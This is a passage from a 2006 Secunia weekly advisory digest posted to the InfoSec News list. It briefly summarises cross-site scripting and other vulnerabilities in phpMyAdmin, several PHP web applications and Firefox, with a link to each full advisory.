Released: 2006-04-17
p0w3r has discovered a vulnerability in phpMyAdmin, which can be
exploited by malicious people to conduct cross-site scripting attacks
and execute arbitrary SQL code.
Full Advisory:
http://secunia.com/advisories/19659/
--
[SA19655] Visale Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-19
r0t has reported some vulnerabilities in Visale, which can be exploited
by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19655/
--
[SA19654] Boardsolution "keyword" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting, Exposure of system information
Released: 2006-04-19
Qex has reported a vulnerability in Boardsolution, which can be
exploited by malicious people to disclose system information and
conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19654/
--
[SA19652] phpFaber TopSites "page" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-19
botan has discovered a vulnerability in phpFaber TopSites, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19652/
--
[SA19651] Net Clubs Pro Multiple Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-20
r0t has reported some vulnerabilities in Net Clubs Pro, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19651/
--
[SA19648] FarsiNews "selected_search_arch" Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting, Exposure of system information
Released: 2006-04-19
R@1D3N has discovered a vulnerability in FarsiNews, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19648/
--
[SA19646] LifeType Template "show" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-04-17
cR45H3R has reported a vulnerability in LifeType, which can be
exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/19646/
--
[SA19698] Firefox "View Image" Local Resource Linking Weakness
Critical: Not critical
Where: From remote
Impact: Security Bypass
Released: 2006-04-18
Eric Foley has discovered a weakness in Firefox, which can be exploited
by malicious people to bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/19698/
========================================================================
Secunia recommends that you verify all advisories you receive,
by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use
those supplied by the vendor.
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Subscribe:
http://secunia.com/secunia_weekly_summary/
Contact details:
Web : http://secunia.com/
E-mail : support@private
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45
_________________________________
InfoSec News v2.0 - Coming Soon!
http://www.infosecnews.org
This archive was generated by hypermail 2.1.3 : Fri Apr 21 2006 - 03:13:04 PDT